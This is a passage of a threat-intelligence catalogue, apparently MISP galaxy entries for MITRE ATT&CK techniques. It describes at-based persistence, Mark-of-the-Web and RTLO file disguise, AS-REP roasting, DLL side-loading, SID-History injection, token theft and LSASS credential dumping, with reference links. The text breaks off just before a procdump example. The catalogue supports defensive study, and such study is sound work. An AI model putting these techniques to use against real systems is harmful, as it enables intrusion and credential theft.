An adversary may use [at](https://attack.mitre.org/software/S0110) in Linux environments to execute programs at system startup or on a scheduled basis for persistence. [at](https://attack.mitre.org/software/S0110) can also be abused to conduct remote Execution as part of Lateral Movement and or to run a process under the context of a specified account.

Adversaries may also abuse [at](https://attack.mitre.org/software/S0110) to break out of restricted environments by using a task to spawn an interactive system shell or to run system commands. Similarly, [at](https://attack.mitre.org/software/S0110) may also be used for [Privilege Escalation](https://attack.mitre.org/tactics/TA0004) if the binary is allowed to run as superuser via <code>sudo</code>.(Citation: GTFObins at)

The tag is: misp-galaxy:mitre-attack-pattern="At (Linux) - T1053.001"

Table 3642. Table References
Links
https://attack.mitre.org/techniques/T1053/001
https://kifarunix.com/scheduling-tasks-using-at-command-in-linux/
https://gtfobins.github.io/gtfobins/at/
https://www.linkedin.com/pulse/getting-attacker-ip-address-from-malicious-linux-job-craig-rowland/

At (Windows) - T1053.002

Adversaries may abuse the <code>at.exe</code> utility to perform task scheduling for initial or recurring execution of malicious code. The [at](https://attack.mitre.org/software/S0110) utility exists as an executable within Windows for scheduling tasks at a specified time and date. Using [at](https://attack.mitre.org/software/S0110) requires that the Task Scheduler service be running, and the user to be logged on as a member of the local Administrators group.

An adversary may use <code>at.exe</code> in Windows environments to execute programs at system startup or on a scheduled basis for persistence. [at](https://attack.mitre.org/software/S0110) can also be abused to conduct remote Execution as part of Lateral Movement and or to run a process under the context of a specified account (such as SYSTEM).

Note: The <code>at.exe</code> command line utility has been deprecated in current versions of Windows in favor of <code>schtasks</code>.

The tag is: misp-galaxy:mitre-attack-pattern="At (Windows) - T1053.002"

Table 3643. Table References
Links
https://attack.mitre.org/techniques/T1053/002
https://twitter.com/leoloobeek/status/939248813465853953
https://social.technet.microsoft.com/Forums/en-US/e5bca729-52e7-4fcb-ba12-3225c564674c/scheduled-tasks-history-retention-settings?forum=winserver8gen
https://technet.microsoft.com/library/dd315590.aspx
https://docs.microsoft.com/en-us/windows/security/threat-protection/auditing/audit-other-object-access-events
https://technet.microsoft.com/en-us/sysinternals/bb963902

Mark-of-the-Web Bypass - T1553.005

Adversaries may abuse specific file formats to subvert Mark-of-the-Web (MOTW) controls. In Windows, when files are downloaded from the Internet, they are tagged with a hidden NTFS Alternate Data Stream (ADS) named <code>Zone.Identifier</code> with a specific value known as the MOTW.(Citation: Microsoft Zone.Identifier 2020) Files that are tagged with MOTW are protected and cannot perform certain actions. For example, starting in MS Office 10, if a MS Office file has the MOTW, it will open in Protected View. Executables tagged with the MOTW will be processed by Windows Defender SmartScreen that compares files with an allowlist of well-known executables. If the file in not known/trusted, SmartScreen will prevent the execution and warn the user not to run it.(Citation: Beek Use of VHD Dec 2020)(Citation: Outflank MotW 2020)(Citation: Intezer Russian APT Dec 2020)

Adversaries may abuse container files such as compressed/archive (.arj, .gzip) and/or disk image (.iso, .vhd) file formats to deliver malicious payloads that may not be tagged with MOTW. Container files downloaded from the Internet will be marked with MOTW but the files within may not inherit the MOTW after the container files are extracted and/or mounted. MOTW is a NTFS feature and many container files do not support NTFS alternative data streams. After a container file is extracted and/or mounted, the files contained within them may be treated as local files on disk and run without protections.(Citation: Beek Use of VHD Dec 2020)(Citation: Outflank MotW 2020)

The tag is: misp-galaxy:mitre-attack-pattern="Mark-of-the-Web Bypass - T1553.005"

Table 3644. Table References
Links
https://attack.mitre.org/techniques/T1553/005
https://docs.microsoft.com/en-us/openspecs/windows_protocols/ms-fscc/6e3f7352-d11c-4d76-8c39-2516a9df36e8
https://medium.com/swlh/investigating-the-use-of-vhd-files-by-cybercriminals-3f1f08304316
https://outflank.nl/blog/2020/03/30/mark-of-the-web-from-a-red-teams-perspective/
https://www.intezer.com/blog/research/russian-apt-uses-covid-19-lures-to-deliver-zebrocy/

Right-to-Left Override - T1036.002

Adversaries may abuse the right-to-left override (RTLO or RLO) character (U+202E) to disguise a string and/or file name to make it appear benign. RTLO is a non-printing Unicode character that causes the text that follows it to be displayed in reverse. For example, a Windows screensaver executable named <code>March 25 \u202Excod.scr</code> will display as <code>March 25 rcs.docx</code>. A JavaScript file named <code>photo_high_re\u202Egnp.js</code> will be displayed as <code>photo_high_resj.png</code>.(Citation: Infosecinstitute RTLO Technique)

Adversaries may abuse the RTLO character as a means of tricking a user into executing what they think is a benign file type. A common use of this technique is with [Spearphishing Attachment](Malicious File(https://attack.mitre.org/techniques/T1204/002) since it can trick both end users and defenders if they are not aware of how their tools display and render the RTLO character. Use of the RTLO character has been seen in many targeted intrusion attempts and criminal activity.(Citation: Trend Micro PLEAD RTLO)(Citation: Kaspersky RTLO Cyber Crime) RTLO can be used in the Windows Registry as well, where regedit.exe displays the reversed characters but the command line tool reg.exe does not by default.

The tag is: misp-galaxy:mitre-attack-pattern="Right-to-Left Override - T1036.002"

Table 3645. Table References
Links
https://attack.mitre.org/techniques/T1036/002
https://resources.infosecinstitute.com/spoof-using-right-to-left-override-rtlo-technique-2/
https://blog.trendmicro.com/trendlabs-security-intelligence/plead-targeted-attacks-against-taiwanese-government-agencies-2/
https://securelist.com/zero-day-vulnerability-in-telegram/83800/

Multi-hop Proxy - T1090.003

To disguise the source of malicious traffic, adversaries may chain together multiple proxies. Typically, a defender will be able to identify the last proxy traffic traversed before it enters their network; the defender may or may not be able to identify any previous proxies before the last-hop proxy. This technique makes identifying the original source of the malicious traffic even more difficult by requiring the defender to trace malicious traffic through several proxies to identify its source. A particular variant of this behavior is to use onion routing networks, such as the publicly available TOR network. (Citation: Onion Routing)

In the case of network infrastructure, particularly routers, it is possible for an adversary to leverage multiple compromised devices to create a multi-hop proxy chain within the Wide-Area Network (WAN) of the enterprise. By leveraging [Patch System Image](https://attack.mitre.org/techniques/T1601/001), adversaries can add custom code to the affected network devices that will implement onion routing between those nodes. This custom onion routing network will transport the encrypted C2 traffic through the compromised population, allowing adversaries to communicate with any device within the onion routing network. This method is dependent upon the [Network Boundary Bridging](https://attack.mitre.org/techniques/T1599) method in order to allow the adversaries to cross the protected network boundary of the Internet perimeter and into the organization’s WAN. Protocols such as ICMP may be used as a transport.

The tag is: misp-galaxy:mitre-attack-pattern="Multi-hop Proxy - T1090.003"

Table 3646. Table References
Links
https://attack.mitre.org/techniques/T1090/003
https://en.wikipedia.org/wiki/Onion_routing

One-Way Communication - T1102.003

Adversaries may use an existing, legitimate external Web service as a means for sending commands to a compromised system without receiving return output over the Web service channel. Compromised systems may leverage popular websites and social media to host command and control (C2) instructions. Those infected systems may opt to send the output from those commands back over a different C2 channel, including to another distinct Web service. Alternatively, compromised systems may return no output at all in cases where adversaries want to send instructions to systems and do not want a response.

The tag is: misp-galaxy:mitre-attack-pattern="One-Way Communication - T1102.003"

Table 3647. Table References
Links
https://attack.mitre.org/techniques/T1102/003
https://arxiv.org/ftp/arxiv/papers/1408/1408.1136.pdf

Drive-by Target - T1608.004

Adversaries may prepare an operational environment to infect systems that visit a website over the normal course of browsing. Endpoint systems may be compromised through browsing to adversary controlled sites, as in [Drive-by Compromise](https://attack.mitre.org/techniques/T1189). In such cases, the user’s web browser is typically targeted for exploitation (often not requiring any extra user interaction once landing on the site), but adversaries may also set up websites for non-exploitation behavior such as [Application Access Token](https://attack.mitre.org/techniques/T1550/001). Prior to [Drive-by Compromise](https://attack.mitre.org/techniques/T1189), adversaries must stage resources needed to deliver that exploit to users who browse to an adversary controlled site. Drive-by content can be staged on adversary controlled infrastructure that has been acquired ([Acquire Infrastructure](https://attack.mitre.org/techniques/T1583)) or previously compromised ([Compromise Infrastructure](https://attack.mitre.org/techniques/T1584)).

Adversaries may upload or inject malicious web content, such as [JavaScript](https://attack.mitre.org/techniques/T1059/007), into websites.(Citation: FireEye CFR Watering Hole 2012)(Citation: Gallagher 2015) This may be done in a number of ways, including inserting malicious script into web pages or other user controllable web content such as forum posts. Adversaries may also craft malicious web advertisements and purchase ad space on a website through legitimate ad providers. In addition to staging content to exploit a user’s web browser, adversaries may also stage scripting content to profile the user’s browser (as in [Gather Victim Host Information](https://attack.mitre.org/techniques/T1592)) to ensure it is vulnerable prior to attempting exploitation.(Citation: ATT ScanBox)

Websites compromised by an adversary and used to stage a drive-by may be ones visited by a specific community, such as government, a particular industry, or region, where the goal is to compromise a specific user or set of users based on a shared interest. This kind of targeted attack is referred to a strategic web compromise or watering hole attack.

Adversaries may purchase domains similar to legitimate domains (ex: homoglyphs, typosquatting, different top-level domain, etc.) during acquisition of infrastructure ([Domains](https://attack.mitre.org/techniques/T1583/001)) to help facilitate [Drive-by Compromise](https://attack.mitre.org/techniques/T1189).

The tag is: misp-galaxy:mitre-attack-pattern="Drive-by Target - T1608.004"

Table 3648. Table References
Links
https://attack.mitre.org/techniques/T1608/004
https://www.fireeye.com/blog/threat-research/2012/12/council-foreign-relations-water-hole-attack-details.html
http://arstechnica.com/security/2015/08/newly-discovered-chinese-hacking-group-hacked-100-websites-to-use-as-watering-holes/
https://cybersecurity.att.com/blogs/labs-research/scanbox-a-reconnaissance-framework-used-on-watering-hole-attacks

Non-Standard Encoding - T1132.002

Adversaries may encode data with a non-standard data encoding system to make the content of command and control traffic more difficult to detect. Command and control (C2) information can be encoded using a non-standard data encoding system that diverges from existing protocol specifications. Non-standard data encoding schemes may be based on or related to standard data encoding schemes, such as a modified Base64 encoding for the message body of an HTTP request.(Citation: Wikipedia Binary-to-text Encoding) (Citation: Wikipedia Character Encoding)

The tag is: misp-galaxy:mitre-attack-pattern="Non-Standard Encoding - T1132.002"

Table 3649. Table References
Links
https://attack.mitre.org/techniques/T1132/002
https://en.wikipedia.org/wiki/Binary-to-text_encoding
https://en.wikipedia.org/wiki/Character_encoding
https://arxiv.org/ftp/arxiv/papers/1408/1408.1136.pdf

SID-History Injection - T1134.005

Adversaries may use SID-History Injection to escalate privileges and bypass access controls. The Windows security identifier (SID) is a unique value that identifies a user or group account. SIDs are used by Windows security in both security descriptors and access tokens. (Citation: Microsoft SID) An account can hold additional SIDs in the SID-History Active Directory attribute (Citation: Microsoft SID-History Attribute), allowing inter-operable account migration between domains (e.g., all values in SID-History are included in access tokens).

With Domain Administrator (or equivalent) rights, harvested or well-known SID values (Citation: Microsoft Well Known SIDs Jun 2017) may be inserted into SID-History to enable impersonation of arbitrary users/groups such as Enterprise Administrators. This manipulation may result in elevated access to local resources and/or access to otherwise inaccessible domains via lateral movement techniques such as [Remote Services](https://attack.mitre.org/techniques/T1021), [SMB/Windows Admin Shares](https://attack.mitre.org/techniques/T1021/002), or [Windows Remote Management](https://attack.mitre.org/techniques/T1021/006).

The tag is: misp-galaxy:mitre-attack-pattern="SID-History Injection - T1134.005"

Table 3650. Table References
Links
https://attack.mitre.org/techniques/T1134/005
https://msdn.microsoft.com/library/windows/desktop/aa379571.aspx
https://msdn.microsoft.com/library/ms679833.aspx
https://support.microsoft.com/help/243330/well-known-security-identifiers-in-windows-operating-systems
https://technet.microsoft.com/library/ee617241.aspx
https://adsecurity.org/?p=1772
https://msdn.microsoft.com/library/ms677982.aspx

DLL Side-Loading - T1574.002

Adversaries may execute their own malicious payloads by side-loading DLLs. Similar to [DLL Search Order Hijacking](https://attack.mitre.org/techniques/T1574/001), side-loading involves hijacking which DLL a program loads. But rather than just planting the DLL within the search order of a program then waiting for the victim application to be invoked, adversaries may directly side-load their payloads by planting then invoking a legitimate application that executes their payload(s).

Side-loading takes advantage of the DLL search order used by the loader by positioning both the victim application and malicious payload(s) alongside each other. Adversaries likely use side-loading as a means of masking actions they perform under a legitimate, trusted, and potentially elevated system or software process. Benign executables used to side-load payloads may not be flagged during delivery and/or execution. Adversary payloads may also be encrypted/packed or otherwise obfuscated until loaded into the memory of the trusted process.(Citation: FireEye DLL Side-Loading)

The tag is: misp-galaxy:mitre-attack-pattern="DLL Side-Loading - T1574.002"

Table 3651. Table References
Links
https://attack.mitre.org/techniques/T1574/002
https://capec.mitre.org/data/definitions/641.html
https://www.fireeye.com/content/dam/fireeye-www/global/en/current-threats/pdfs/rpt-dll-sideloading.pdf

AS-REP Roasting - T1558.004

Adversaries may reveal credentials of accounts that have disabled Kerberos preauthentication by [Password Cracking](https://attack.mitre.org/techniques/T1110/002) Kerberos messages.(Citation: Harmj0y Roasting AS-REPs Jan 2017)

Preauthentication offers protection against offline [Password Cracking](https://attack.mitre.org/techniques/T1110/002). When enabled, a user requesting access to a resource initiates communication with the Domain Controller (DC) by sending an Authentication Server Request (AS-REQ) message with a timestamp that is encrypted with the hash of their password. If and only if the DC is able to successfully decrypt the timestamp with the hash of the user’s password, it will then send an Authentication Server Response (AS-REP) message that contains the Ticket Granting Ticket (TGT) to the user. Part of the AS-REP message is signed with the user’s password.(Citation: Microsoft Kerberos Preauth 2014)

For each account found without preauthentication, an adversary may send an AS-REQ message without the encrypted timestamp and receive an AS-REP message with TGT data which may be encrypted with an insecure algorithm such as RC4. The recovered encrypted data may be vulnerable to offline [Password Cracking](https://attack.mitre.org/techniques/T1110/002) attacks similarly to [Kerberoasting](https://attack.mitre.org/techniques/T1558/003) and expose plaintext credentials. (Citation: Harmj0y Roasting AS-REPs Jan 2017)(Citation: Stealthbits Cracking AS-REP Roasting Jun 2019)

An account registered to a domain, with or without special privileges, can be abused to list all domain accounts that have preauthentication disabled by utilizing Windows tools like [PowerShell](https://attack.mitre.org/techniques/T1059/001) with an LDAP filter. Alternatively, the adversary may send an AS-REQ message for each user. If the DC responds without errors, the account does not require preauthentication and the AS-REP message will already contain the encrypted data. (Citation: Harmj0y Roasting AS-REPs Jan 2017)(Citation: Stealthbits Cracking AS-REP Roasting Jun 2019)

Cracked hashes may enable [Persistence](https://attack.mitre.org/tactics/TA0003), [Privilege Escalation](https://attack.mitre.org/tactics/TA0004), and [Lateral Movement](https://attack.mitre.org/tactics/TA0008) via access to [Valid Accounts](https://attack.mitre.org/techniques/T1078).(Citation: SANS Attacking Kerberos Nov 2014)

The tag is: misp-galaxy:mitre-attack-pattern="AS-REP Roasting - T1558.004"

Table 3652. Table References
Links
https://attack.mitre.org/techniques/T1558/004
http://www.harmj0y.net/blog/activedirectory/roasting-as-reps/
https://social.technet.microsoft.com/wiki/contents/articles/23559.kerberos-pre-authentication-why-it-should-not-be-disabled.aspx
https://blog.stealthbits.com/cracking-active-directory-passwords-with-as-rep-roasting/
https://redsiege.com/kerberoast-slides
https://adsecurity.org/?p=2293
https://blogs.technet.microsoft.com/motiba/2018/02/23/detecting-kerberoasting-activity-using-azure-security-center/
https://docs.microsoft.com/en-us/windows/security/threat-protection/auditing/event-4768

Re-opened Applications - T1547.007

Adversaries may modify plist files to automatically run an application when a user logs in. Starting in Mac OS X 10.7 (Lion), users can specify certain applications to be re-opened when a user logs into their machine after reboot. While this is usually done via a Graphical User Interface (GUI) on an app-by-app basis, there are property list files (plist) that contain this information as well located at <code>~/Library/Preferences/com.apple.loginwindow.plist</code> and <code>~/Library/Preferences/ByHost/com.apple.loginwindow.* .plist</code>.

An adversary can modify one of these files directly to include a link to their malicious executable to provide a persistence mechanism each time the user reboots their machine (Citation: Methods of Mac Malware Persistence).

The tag is: misp-galaxy:mitre-attack-pattern="Re-opened Applications - T1547.007"

Table 3653. Table References
Links
https://attack.mitre.org/techniques/T1547/007
https://www.virusbulletin.com/uploads/pdf/conference/vb2014/VB2014-Wardle.pdf

Obtain/re-use payloads - T1346

A payload is the part of the malware which performs a malicious action. The adversary may re-use payloads when the needed capability is already available. (Citation: SonyDestover)

The tag is: misp-galaxy:mitre-attack-pattern="Obtain/re-use payloads - T1346"

Table 3654. Table References
Links
https://attack.mitre.org/techniques/T1346

Multi-Stage Channels - T1104

Adversaries may create multiple stages for command and control that are employed under different conditions or for certain functions. Use of multiple stages may obfuscate the command and control channel to make detection more difficult.

Remote access tools will call back to the first-stage command and control server for instructions. The first stage may have automated capabilities to collect basic host information, update tools, and upload additional files. A second remote access tool (RAT) could be uploaded at that point to redirect the host to the second-stage command and control server. The second stage will likely be more fully featured and allow the adversary to interact with the system through a reverse shell and additional RAT features.

The different stages will likely be hosted separately with no overlapping infrastructure. The loader may also have backup first-stage callbacks or [Fallback Channels](https://attack.mitre.org/techniques/T1008) in case the original first-stage communication path is discovered and blocked.

The tag is: misp-galaxy:mitre-attack-pattern="Multi-Stage Channels - T1104"

Table 3655. Table References
Links
https://attack.mitre.org/techniques/T1104

DLL Side-Loading - T1073

Programs may specify DLLs that are loaded at runtime. Programs that improperly or vaguely specify a required DLL may be open to a vulnerability in which an unintended DLL is loaded. Side-loading vulnerabilities specifically occur when Windows Side-by-Side (WinSxS) manifests (Citation: MSDN Manifests) are not explicit enough about characteristics of the DLL to be loaded. Adversaries may take advantage of a legitimate program that is vulnerable to side-loading to load a malicious DLL. (Citation: Stewart 2014)

Adversaries likely use this technique as a means of masking actions they perform under a legitimate, trusted system or software process.

The tag is: misp-galaxy:mitre-attack-pattern="DLL Side-Loading - T1073"

View relationships graph

DLL Side-Loading - T1073 has relationships with:

revoked-by: misp-galaxy:mitre-attack-pattern="DLL Side-Loading - T1574.002" with estimative-language:likelihood-probability="almost-certain"

Table 3656. Table References
Links
https://attack.mitre.org/techniques/T1073
https://capec.mitre.org/data/definitions/641.html
https://msdn.microsoft.com/en-us/library/aa375365
https://www.fireeye.com/content/dam/fireeye-www/global/en/current-threats/pdfs/rpt-dll-sideloading.pdf

Command-Line Interface - T1605

Adversaries may use built-in command-line interfaces to interact with the device and execute commands. Android provides a bash shell that can be interacted with over the Android Debug Bridge (ADB) or programmatically using Java’s Runtime package. On iOS, adversaries can interact with the underlying runtime shell if the device has been jailbroken.

If the device has been rooted or jailbroken, adversaries may locate and invoke a superuser binary to elevate their privileges and interact with the system as the root user. This dangerous level of permissions allows the adversary to run special commands and modify protected system files.

The tag is: misp-galaxy:mitre-attack-pattern="Command-Line Interface - T1605"

Table 3657. Table References
Links
https://attack.mitre.org/techniques/T1605

Re-opened Applications - T1164

Starting in Mac OS X 10.7 (Lion), users can specify certain applications to be re-opened when a user reboots their machine. While this is usually done via a Graphical User Interface (GUI) on an app-by-app basis, there are property list files (plist) that contain this information as well located at <code>~/Library/Preferences/com.apple.loginwindow.plist</code> and <code>~/Library/Preferences/ByHost/com.apple.loginwindow.* .plist</code>.

The tag is: misp-galaxy:mitre-attack-pattern="Re-opened Applications - T1164"

View relationships graph

Re-opened Applications - T1164 has relationships with:

revoked-by: misp-galaxy:mitre-attack-pattern="Re-opened Applications - T1547.007" with estimative-language:likelihood-probability="almost-certain"

Table 3658. Table References
Links
https://attack.mitre.org/techniques/T1164
https://www.virusbulletin.com/uploads/pdf/conference/vb2014/VB2014-Wardle.pdf

Non-Standard Port - T1571

Adversaries may communicate using a protocol and port paring that are typically not associated. For example, HTTPS over port 8088(Citation: Symantec Elfin Mar 2019) or port 587(Citation: Fortinet Agent Tesla April 2018) as opposed to the traditional port 443. Adversaries may make changes to the standard port used by a protocol to bypass filtering or muddle analysis/parsing of network data.

The tag is: misp-galaxy:mitre-attack-pattern="Non-Standard Port - T1571"

Table 3659. Table References
Links
https://attack.mitre.org/techniques/T1571
https://www.symantec.com/blogs/threat-intelligence/elfin-apt33-espionage
https://www.fortinet.com/blog/threat-research/analysis-of-new-agent-tesla-spyware-variant.html
https://arxiv.org/ftp/arxiv/papers/1408/1408.1136.pdf

SID-History Injection - T1178

The Windows security identifier (SID) is a unique value that identifies a user or group account. SIDs are used by Windows security in both security descriptors and access tokens. (Citation: Microsoft SID) An account can hold additional SIDs in the SID-History Active Directory attribute (Citation: Microsoft SID-History Attribute), allowing inter-operable account migration between domains (e.g., all values in SID-History are included in access tokens).

Adversaries may use this mechanism for privilege escalation. With Domain Administrator (or equivalent) rights, harvested or well-known SID values (Citation: Microsoft Well Known SIDs Jun 2017) may be inserted into SID-History to enable impersonation of arbitrary users/groups such as Enterprise Administrators. This manipulation may result in elevated access to local resources and/or access to otherwise inaccessible domains via lateral movement techniques such as [Remote Services](https://attack.mitre.org/techniques/T1021), [Windows Admin Shares](https://attack.mitre.org/techniques/T1077), or [Windows Remote Management](https://attack.mitre.org/techniques/T1028).

The tag is: misp-galaxy:mitre-attack-pattern="SID-History Injection - T1178"

View relationships graph

SID-History Injection - T1178 has relationships with:

revoked-by: misp-galaxy:mitre-attack-pattern="SID-History Injection - T1134.005" with estimative-language:likelihood-probability="almost-certain"

Table 3660. Table References
Links
https://attack.mitre.org/techniques/T1178
https://msdn.microsoft.com/library/windows/desktop/aa379571.aspx
https://msdn.microsoft.com/library/ms679833.aspx
https://support.microsoft.com/help/243330/well-known-security-identifiers-in-windows-operating-systems
https://technet.microsoft.com/library/ee617241.aspx
https://adsecurity.org/?p=1772
https://msdn.microsoft.com/library/ms677982.aspx

Multi-hop Proxy - T1188

The tag is: misp-galaxy:mitre-attack-pattern="Multi-hop Proxy - T1188"

View relationships graph

Multi-hop Proxy - T1188 has relationships with:

revoked-by: misp-galaxy:mitre-attack-pattern="Multi-hop Proxy - T1090.003" with estimative-language:likelihood-probability="almost-certain"

Table 3661. Table References
Links
https://attack.mitre.org/techniques/T1188

Drive-by Compromise - T1189

Adversaries may gain access to a system through a user visiting a website over the normal course of browsing. With this technique, the user’s web browser is typically targeted for exploitation, but adversaries may also use compromised websites for non-exploitation behavior such as acquiring [Application Access Token](https://attack.mitre.org/techniques/T1550/001).

Multiple ways of delivering exploit code to a browser exist, including:

A legitimate website is compromised where adversaries have injected some form of malicious code such as JavaScript, iFrames, and cross-site scripting.
Malicious ads are paid for and served through legitimate ad providers.
Built-in web application interfaces are leveraged for the insertion of any other kind of object that can be used to display web content or contain a script that executes on the visiting client (e.g. forum posts, comments, and other user controllable web content).

Often the website used by an adversary is one visited by a specific community, such as government, a particular industry, or region, where the goal is to compromise a specific user or set of users based on a shared interest. This kind of targeted attack is referred to a strategic web compromise or watering hole attack. There are several known examples of this occurring.(Citation: Shadowserver Strategic Web Compromise)

Typical drive-by compromise process:

A user visits a website that is used to host the adversary controlled content.
Scripts automatically execute, typically searching versions of the browser and plugins for a potentially vulnerable version.
- The user may be required to assist in this process by enabling scripting or active website components and ignoring warning dialog boxes.
Upon finding a vulnerable version, exploit code is delivered to the browser.
If exploitation is successful, then it will give the adversary code execution on the user’s system unless other protections are in place.
- In some cases a second visit to the website after the initial scan is required before exploit code is delivered.

Unlike [Exploit Public-Facing Application](https://attack.mitre.org/techniques/T1190), the focus of this technique is to exploit software on a client endpoint upon visiting a website. This will commonly give an adversary access to systems on the internal network instead of external systems that may be in a DMZ.

Adversaries may also use compromised websites to deliver a user to a malicious application designed to [Steal Application Access Token](https://attack.mitre.org/techniques/T1528)s, like OAuth tokens, to gain access to protected applications and information. These malicious applications have been delivered through popups on legitimate websites.(Citation: Volexity OceanLotus Nov 2017)

The tag is: misp-galaxy:mitre-attack-pattern="Drive-by Compromise - T1189"

Table 3662. Table References
Links
https://attack.mitre.org/techniques/T1189
http://blog.shadowserver.org/2012/05/15/cyber-espionage-strategic-web-compromises-trusted-websites-serving-dangerous-results/
https://www.volexity.com/blog/2017/11/06/oceanlotus-blossoms-mass-digital-surveillance-and-exploitation-of-asean-nations-the-media-human-rights-and-civil-society/

Pre-OS Boot - T1542

Adversaries may abuse Pre-OS Boot mechanisms as a way to establish persistence on a system. During the booting process of a computer, firmware and various startup services are loaded before the operating system. These programs control flow of execution before the operating system takes control.(Citation: Wikipedia Booting)

Adversaries may overwrite data in boot drivers or firmware such as BIOS (Basic Input/Output System) and The Unified Extensible Firmware Interface (UEFI) to persist on systems at a layer below the operating system. This can be particularly difficult to detect as malware at this level will not be detected by host software-based defenses.

The tag is: misp-galaxy:mitre-attack-pattern="Pre-OS Boot - T1542"

Table 3663. Table References
Links
https://attack.mitre.org/techniques/T1542
https://en.wikipedia.org/wiki/Booting
https://www.itworld.com/article/2853992/3-tools-to-check-your-hard-drives-health-and-make-sure-its-not-already-dying-on-you.html

Drive-by Compromise - T1456

As described by [Drive-by Compromise](https://attack.mitre.org/techniques/T1189), a drive-by compromise is when an adversary gains access to a system through a user visiting a website over the normal course of browsing. With this technique, the user’s web browser is targeted for exploitation. For example, a website may contain malicious media content intended to exploit vulnerabilities in media parsers as demonstrated by the Android Stagefright vulnerability (Citation: Zimperium-Stagefright).

(This technique was formerly known as Malicious Web Content. It has been renamed to better align with ATT&CK for Enterprise.)

The tag is: misp-galaxy:mitre-attack-pattern="Drive-by Compromise - T1456"

Table 3664. Table References
Links
https://attack.mitre.org/techniques/T1456
https://pages.nist.gov/mobile-threat-catalogue/cellular-threats/CEL-22.html
https://blog.zimperium.com/experts-found-a-unicorn-in-the-heart-of-android/

Inter-Process Communication - T1559

Adversaries may abuse inter-process communication (IPC) mechanisms for local code or command execution. IPC is typically used by processes to share data, communicate with each other, or synchronize execution. IPC is also commonly used to avoid situations such as deadlocks, which occurs when processes are stuck in a cyclic waiting pattern.

Adversaries may abuse IPC to execute arbitrary code or commands. IPC mechanisms may differ depending on OS, but typically exists in a form accessible through programming languages/libraries or native interfaces such as Windows [Dynamic Data Exchange](https://attack.mitre.org/techniques/T1559/002) or [Component Object Model](https://attack.mitre.org/techniques/T1559/001). Higher level execution mediums, such as those of [Command and Scripting Interpreter](https://attack.mitre.org/techniques/T1059)s, may also leverage underlying IPC mechanisms. Adversaries may also use [Remote Services](https://attack.mitre.org/techniques/T1021) such as [Distributed Component Object Model](https://attack.mitre.org/techniques/T1021/003) to facilitate remote IPC execution.(Citation: Fireeye Hunting COM June 2019)

The tag is: misp-galaxy:mitre-attack-pattern="Inter-Process Communication - T1559"

Table 3665. Table References
Links
https://attack.mitre.org/techniques/T1559
https://www.fireeye.com/blog/threat-research/2019/06/hunting-com-objects.html

Token Impersonation/Theft - T1134.001

Adversaries may duplicate then impersonate another user’s token to escalate privileges and bypass access controls. An adversary can create a new access token that duplicates an existing token using <code>DuplicateToken(Ex)</code>. The token can then be used with <code>ImpersonateLoggedOnUser</code> to allow the calling thread to impersonate a logged on user’s security context, or with <code>SetThreadToken</code> to assign the impersonated token to a thread.

An adversary may do this when they have a specific, existing process they want to assign the new token to. For example, this may be useful for when the target user has a non-network logon session on the system.

The tag is: misp-galaxy:mitre-attack-pattern="Token Impersonation/Theft - T1134.001"

Table 3666. Table References
Links
https://attack.mitre.org/techniques/T1134/001
https://technet.microsoft.com/en-us/windows-server-docs/identity/ad-ds/manage/component-updates/command-line-process-auditing

DNS/Passive DNS - T1596.001

Adversaries may search DNS data for information about victims that can be used during targeting. DNS information may include a variety of details, including registered name servers as well as records that outline addressing for a target’s subdomains, mail servers, and other hosts.

Adversaries may search DNS data to gather actionable information. Threat actors can query nameservers for a target organization directly, or search through centralized repositories of logged DNS query responses (known as passive DNS).(Citation: DNS Dumpster)(Citation: Circl Passive DNS) Adversaries may also seek and target DNS misconfigurations/leaks that reveal information about internal networks. Information from these sources may reveal opportunities for other forms of reconnaissance (ex: [Search Victim-Owned Websites](https://attack.mitre.org/techniques/T1594) or [Search Open Websites/Domains](https://attack.mitre.org/techniques/T1593)), establishing operational resources (ex: [Acquire Infrastructure](https://attack.mitre.org/techniques/T1583) or [Compromise Infrastructure](https://attack.mitre.org/techniques/T1584)), and/or initial access (ex: [External Remote Services](https://attack.mitre.org/techniques/T1133) or [Trusted Relationship](https://attack.mitre.org/techniques/T1199)).

The tag is: misp-galaxy:mitre-attack-pattern="DNS/Passive DNS - T1596.001"

Table 3667. Table References
Links
https://attack.mitre.org/techniques/T1596/001
https://dnsdumpster.com/
https://www.circl.lu/services/passive-dns/

Junk Data - T1001.001

Adversaries may add junk data to protocols used for command and control to make detection more difficult. By adding random or meaningless data to the protocols used for command and control, adversaries can prevent trivial methods for decoding, deciphering, or otherwise analyzing the traffic. Examples may include appending/prepending data with junk characters or writing junk characters between significant characters.

The tag is: misp-galaxy:mitre-attack-pattern="Junk Data - T1001.001"

Table 3668. Table References
Links
https://attack.mitre.org/techniques/T1001/001
https://arxiv.org/ftp/arxiv/papers/1408/1408.1136.pdf

Traffic Duplication - T1020.001

Adversaries may leverage traffic mirroring in order to automate data exfiltration over compromised network infrastructure. Traffic mirroring is a native feature for some network devices and used for network analysis and may be configured to duplicate traffic and forward to one or more destinations for analysis by a network analyzer or other monitoring device. (Citation: Cisco Traffic Mirroring) (Citation: Juniper Traffic Mirroring)

Adversaries may abuse traffic mirroring to mirror or redirect network traffic through other network infrastructure they control. Malicious modifications to network devices to enable traffic redirection may be possible through [ROMMONkit](https://attack.mitre.org/techniques/T1542/004) or [Patch System Image](https://attack.mitre.org/techniques/T1601/001).(Citation: US-CERT-TA18-106A)(Citation: Cisco Blog Legacy Device Attacks) Adversaries may use traffic duplication in conjunction with [Network Sniffing](https://attack.mitre.org/techniques/T1040), [Input Capture](https://attack.mitre.org/techniques/T1056), or [Adversary-in-the-Middle](https://attack.mitre.org/techniques/T1557) depending on the goals and objectives of the adversary.

The tag is: misp-galaxy:mitre-attack-pattern="Traffic Duplication - T1020.001"

Table 3669. Table References
Links
https://attack.mitre.org/techniques/T1020/001
https://capec.mitre.org/data/definitions/117.html
https://www.cisco.com/c/en/us/td/docs/routers/crs/software/crs_r5-1/interfaces/configuration/guide/hc51xcrsbook/hc51span.html
https://www.juniper.net/documentation/en_US/junos/topics/concept/port-mirroring-ex-series.html
https://www.us-cert.gov/ncas/alerts/TA18-106A
https://community.cisco.com/t5/security-blogs/attackers-continue-to-target-legacy-devices/ba-p/4169954

LSASS Memory - T1003.001

Adversaries may attempt to access credential material stored in the process memory of the Local Security Authority Subsystem Service (LSASS). After a user logs on, the system generates and stores a variety of credential materials in LSASS process memory. These credential materials can be harvested by an administrative user or SYSTEM and used to conduct [Lateral Movement](https://attack.mitre.org/tactics/TA0008) using [Use Alternate Authentication Material](https://attack.mitre.org/techniques/T1550).

As well as in-memory techniques, the LSASS process memory can be dumped from the target host and analyzed on a local system.

For example, on the target host use procdump:

